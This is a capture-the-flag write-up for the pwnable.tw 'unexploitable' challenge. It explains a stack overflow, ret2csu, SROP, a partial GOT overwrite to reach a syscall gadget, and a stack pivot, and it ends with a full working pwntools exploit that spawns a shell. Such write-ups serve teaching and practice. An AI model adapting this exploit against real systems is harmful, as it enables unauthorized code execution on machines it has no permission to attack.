unexploitable [500 pts]

The original challenge is on pwnable.kr and it is solvable.

This time we fix the vulnerability and now we promise that the service is unexploitable.

nc chall.pwnable.tw 10403

unexploitable libc.so

Initial Analysis

By running checksec, we can view the protections and memory corruption mitigations enabled on this binary.

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

As we can see, the only notable protection enabled is NX, which means the stack is non-executable. There is no stack canary, no PIE, and only Partial RELRO.

Let’s decompile the binary and take a look at its insides.

main

The binary is very simple: it sleeps for 3 seconds, then reads 256 bytes into a 16-byte buffer. The vulnerability is an obvious buffer overflow, and with no stack canary and no PIE we can hijack control flow without any leaks.
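The distance to the saved return address follows from the stack layout. The following is a minimal sketch, assuming the 16-byte buffer sits directly below the saved base pointer (which agrees with the offset of 24 used in the exploit later in this post). The constant names and the placeholder return address are illustrative only.

```python
import struct

BUF_SIZE = 16        # size of the local buffer in main
SAVED_RBP_SIZE = 8   # saved base pointer between the buffer and the return address
READ_SIZE = 0x100    # number of bytes main passes to read()

# Bytes of padding needed before we reach the saved return address.
offset = BUF_SIZE + SAVED_RBP_SIZE

# Room left for a ROP chain after the padding, in bytes and in 8-byte slots.
chain_room = READ_SIZE - offset
chain_slots = chain_room // 8

# Placeholder return address, only to show the shape of the payload.
payload = b"A" * offset + struct.pack("<Q", 0x4141414141414141)

print(offset, chain_room, chain_slots)
```

The first read therefore leaves room for only 29 return-address-sized slots, which matters once the chains get long.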

As this is a 500 point challenge, the binary seemed deceptively simple. First and foremost, we aren’t given much. At first glance, there doesn’t seem to be any way to spawn a shell with so little to work with.

Exploitation

I found two solutions to this challenge, both built on the same idea: we need some means of controlling the current execution context, particularly the registers, so that we can spawn a shell via execve().

The first solution uses ret2csu, in which we use the gadgets present in __libc_csu_init() to gain control of the registers needed to spawn a shell. Keep in mind that this technique no longer works against binaries built with newer versions of glibc: as of glibc 2.34, __libc_csu_init is no longer linked into the binary, and its work is done inside libc by call_init. That change removed the gadgets this technique depends on from the binary.
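The shape of a single ret2csu call can be sketched with nothing but struct. The gadget addresses are the ones used in the exploit later in this post. The descriptions of what each gadget does are an assumption based on the usual __libc_csu_init layout and should be checked against the disassembly. FUNC_PTR is a hypothetical placeholder for a GOT slot.

```python
import struct

# Addresses from the exploit in this post; specific to this binary.
CSU_POP = 0x4005e6   # assumed: add rsp, 8 ; pop rbx, rbp, r12, r13, r14, r15 ; ret
CSU_CALL = 0x4005d0  # assumed: load the argument registers, then call [r12 + rbx*8]

def csu_chain(func_ptr, a1=0, a2=0, a3=0):
    """Build one call through the function pointer stored at func_ptr."""
    slots = [
        CSU_POP,
        0,          # skipped by add rsp, 8
        0,          # rbx = 0, the index into the pointer table
        1,          # rbp = 1, so the loop exits after one call
        func_ptr,   # r12 = address that holds the function pointer
        a1, a2, a3, # r13, r14, r15 become the three arguments
        CSU_CALL,
    ]
    slots += [0] * 7  # consumed by add rsp, 8 and six pops after the call returns
    return struct.pack("<%dQ" % len(slots), *slots)

FUNC_PTR = 0xdeadbeef  # hypothetical placeholder for a GOT entry address
chain = csu_chain(FUNC_PTR, 0, 0x601028, 1024)
print(len(chain))
```

Each call costs 16 slots (128 bytes). Note that r12 must hold a pointer to a function pointer, which is why GOT entries are convenient targets.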

The second solution uses sigreturn-oriented programming (SROP), which abuses the signal handling mechanism by forging a fake signal frame. When a signal is delivered, the kernel saves the execution context of the running process in a signal frame on the user-space stack before running the handler, and sigreturn later restores the context from that frame. Because the frame lives on the stack, a forged one lets us set every register at once. A more in-depth explanation of the technique is detailed within the sigreturn oriented programming post.
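To give a rough idea of what a forged frame looks like, here is a sketch that is not the exploit used in this post. It assumes the field order of the 248-byte amd64 frame that pwntools' SigreturnFrame emits; the last two slot names are placeholders. SYSCALL_ADDR is a hypothetical address of a syscall instruction.

```python
import struct

# Assumed field order of the amd64 sigreturn frame, one 8-byte slot each.
FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "pad0", "pad1",
]

def sigreturn_frame(**regs):
    """Pack a frame with every field zero except the ones given."""
    values = dict.fromkeys(FIELDS, 0)
    values["csgsfs"] = 0x33  # 64-bit user code segment selector
    for name, value in regs.items():
        if name not in values:
            raise KeyError(name)
        values[name] = value
    return b"".join(struct.pack("<Q", values[name]) for name in FIELDS)

BIN_SH = 0x601028          # where this post's exploit stores "/bin/sh"
SYSCALL_ADDR = 0xdeadbeef  # hypothetical address of a syscall instruction

# Context for execve("/bin/sh", 0, 0): rax = 59, rip = syscall.
frame = sigreturn_frame(rax=59, rdi=BIN_SH, rsi=0, rdx=0, rip=SYSCALL_ADDR)
print(len(frame))
```

The frame takes effect when rt_sigreturn (syscall number 15 on x86_64) is invoked with the stack pointer at the start of the frame, so this route also needs a way to set rax and a syscall gadget.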

Our next problem is that we don’t have a syscall gadget, nor do we have any obvious means of setting the rax register to our desired value of 59 (execve).

In the x86_64 ABI, the ax register (and its extended forms eax and rax) serves several purposes, one of which is holding the return value of each executed routine. If we can hijack program control, we can populate rax with whatever value we want by calling a function whose return value we control.

The following is a snippet from the man page for the read system call.

RETURN VALUE
  Upon successful completion, these functions shall return a non-negative
  integer indicating the number of bytes actually read. Otherwise, the
  functions shall return -1 and set errno to indicate the error.

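By leveraging the read import, we gain control of the rax register: read returns the number of bytes it actually read, so the amount of data we send decides the value left in rax.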
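This behaviour is easy to observe locally. In the sketch below a pipe stands in for the socket the service reads from, and the length of the returned data is the value the read system call would leave in rax.

```python
import os

# A pipe stands in for the connection to the service.
read_end, write_end = os.pipe()

# Send exactly 59 bytes, the x86_64 syscall number of execve.
os.write(write_end, b"B" * 59)

# Ask for far more than was sent; read returns only what is available.
data = os.read(read_end, 1024)
bytes_read = len(data)  # the count that read() reports as its return value

os.close(read_end)
os.close(write_end)
print(bytes_read)
```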

We also need a reference to whichever binary we want to execute, which in this case is /bin/sh\x00. This can be achieved simply by reading the string into a writeable section of memory and passing that reference to execve.

Our last problem is that of the syscall gadget, as one isn’t present within the binary.

However, notice that Full RELRO is not enabled, which means the global offset table is writeable. Despite ASLR being enabled, libraries are mapped at page-aligned addresses (multiples of 0x1000), meaning that the three least significant nibbles of every libc address are fixed and known.
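The effect of page alignment can be checked with a few lines of arithmetic. This sketch uses the offset of sleep in the provided libc (0xcb680, from the radare2 output in this post); the random base generator is a hypothetical stand-in for ASLR, not a model of the real kernel behaviour.

```python
import random

SLEEP_OFFSET = 0xcb680  # offset of sleep in the provided libc
PAGE_SIZE = 0x1000

def random_libc_base(rng):
    # Hypothetical stand-in for ASLR: any page-aligned base in a plausible range.
    return rng.randrange(0x7f0000000000, 0x7fffffffffff, PAGE_SIZE)

rng = random.Random(0)
bases = [random_libc_base(rng) for _ in range(1000)]

# Collect the low 12 bits of sleep's runtime address for every base.
low_bits = {(base + SLEEP_OFFSET) & 0xfff for base in bases}

print([hex(bits) for bits in low_bits])
```

Whatever base is chosen, the low 12 bits of the runtime address equal the low 12 bits of the offset inside the library.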

Because the addresses of imported symbols are resolved lazily at runtime and stored in the GOT, and sleep has already been called by the time we take control, its GOT entry holds a real libc address. By overwriting only the low bytes of that entry, we can redirect it to a nearby instruction in libc without needing a leak. Let’s take a look at the surrounding instructions in the libc provided to us and see if we can find a syscall instruction. I chose to overwrite the sleep import.

To do so, we first find the address of sleep within libc, then search the instructions that a partial overwrite can reliably reach.

[0x000cb680]> pd 1 @sym.sleep
            ; CALL XREF from sym.argp_error @ +0x205(x)
            ; CALL XREF from sym.rcmd_af @ 0x11d49b(x)
            ; CALL XREF from sym.rexec_af @ 0x11e124(x)
┌ 68: int sym.sleep (int s);
│ rg: 1 (vars 0, args 1)
│ bp: 0 (vars 0, args 0)
│ sp: 1 (vars 1, args 0)
│           0x000cb680      55             push rbp
[0x000cb680]>

Since only the low 12 bits are fixed, every address in the range 0x000cb000-0x000cbfff has fully known low bits. We can only write whole bytes, though, so a one-byte overwrite reliably reaches 0x000cb600-0x000cb6ff, while a two-byte overwrite would require guessing one nibble. By searching for instructions within reach, I chose the syscall gadget at the address 0x000cb655. So by overwriting the least significant byte of the sleep GOT entry with \x55, we effectively gain the ability to invoke system calls.
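The one-byte overwrite can be simulated on a fake GOT entry. The two offsets come from this post; the libc base is a hypothetical value chosen only for illustration.

```python
import struct

SLEEP_OFFSET = 0xcb680    # sleep in the provided libc
SYSCALL_OFFSET = 0xcb655  # syscall gadget chosen in this post

def overwrite_lsb(got_entry: bytes, new_byte: int) -> bytes:
    """Replace the least significant byte of a little-endian pointer."""
    return bytes([new_byte]) + got_entry[1:]

libc_base = 0x7f1234567000  # hypothetical page-aligned base

# The resolved GOT entry as it sits in memory (little endian).
got_sleep = struct.pack("<Q", libc_base + SLEEP_OFFSET)

# A one-byte read into the entry changes only the first byte in memory.
patched = overwrite_lsb(got_sleep, 0x55)
target = struct.unpack("<Q", patched)[0]

print(hex(target), hex(target - libc_base))
```

Because the entry is stored little endian, the first byte written is the least significant one, and the upper bytes that ASLR randomizes are left untouched.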

Keep in mind that when debugging locally without the provided libc, you will have to update this byte to point at a syscall instruction in whichever libc you are using (the exploit below sends \xb9 for my local libc).

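I chose to use the ret2csu technique; the full exploit code is provided below. Note how rax is set in the second stage: the one-byte read into the sleep GOT entry returns 1, so the first call through the patched entry is write(1, bss_section, 59), which in turn returns 59 and turns the second call into execve(bss_section, 0, 0).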

#!/usr/bin/env python3
from pwn import *
from sys import argv
from time import sleep

binary = ELF('unexploitable', checksec=0)
libc = ELF('libc_64.so.6', checksec=0)
context.arch='amd64'
context.log_level='DEBUG'
r=False
if len(argv) >= 2 and argv[1] == '-r':
  r=True
  p = remote('chall.pwnable.tw', 10403)
else:
  p = binary.process(env={})
s = lambda x, r="" : \
  p.sendafter(r, x) if r else p.send(x)
sl = lambda x, r="" : \
  p.sendlineafter(r, x) if r else p.sendline(x)

csu_gadget_1 = 0x004005e6
csu_gadget_2 = 0x004005d0
csu_chain = lambda f, a1=0, a2=0, a3=0 : \
  flat(csu_gadget_1, 0, 0, 1, f, a1, a2, a3, csu_gadget_2) + p64(0)*7

offset=24
bss_section=0x00601028

pause()

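payload = b'A'*offset           # pad over the 16-byte buffer and the saved base pointer
payload += csu_chain(binary.got['read'], 0, bss_section, 1024) # read(0, bss_section, 1024): stage 2
payload += p64(0x0000000000400512) # pop rbp ; ret
payload += p64(bss_section)        # rbp = start of stage 2
payload += p64(0x0000000000400576) # leave ; ret: pivot the stack to bss_section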

log.info("sleep(3)")
sleep(3)
log.info("Sending payload 1")

p.send(payload)

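payload2 = b'/bin/sh\x00' # popped into rbp by leave; also the execve path at bss_section
payload2 += csu_chain(binary.got['read'], 0, binary.got['sleep'], 1) # patch low byte of sleep GOT entry
payload2 += csu_chain(binary.got['sleep'], 1, bss_section, 59)       # rax == 1: write returns 59
payload2 += csu_chain(binary.got['sleep'], bss_section, 0, 0)        # rax == 59: execve

p.send(payload2)
sleep(1) # let the 1024-byte read return before sending the GOT byte
# low byte of the syscall gadget: \x55 for the provided libc, \xb9 for my local libc
p.send(b'\x55' if r else b'\xb9')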
p.interactive()

Conclusion

Something to keep in mind is that the initial read within main only lets us read 0x100 bytes into the local buffer. With ret2csu it is very easy to craft ROP chains that are larger than this. We can circumvent the limit with a stack pivot to any readable and writable region at a known address; I chose to use the .bss section.
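The size problem is visible from simple arithmetic over the two payloads in the exploit above. The sketch below only counts bytes. It assumes each ret2csu call takes 16 eight-byte slots, as in the csu_chain helper.

```python
QWORD = 8
CSU_CHAIN_SIZE = 16 * QWORD  # 9 slots before the call plus 7 of padding

READ_LIMIT = 0x100           # first read in main
STAGE2_READ = 1024           # size requested by the stage 1 read into .bss

# Stage 1: padding, one csu call, then pop rbp / new rbp / leave ; ret.
stage1_size = 24 + CSU_CHAIN_SIZE + 3 * QWORD

# Stage 2: the "/bin/sh" string followed by three csu calls.
stage2_size = QWORD + 3 * CSU_CHAIN_SIZE

print(stage1_size, stage2_size)
print(stage1_size <= READ_LIMIT, stage2_size <= READ_LIMIT)
```

Stage 1 fits within the 0x100-byte read, while stage 2 does not, which is why it is read into the .bss section with a larger size and reached through the pivot.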

Thanks for reading ＼(≧▽≦)／ !!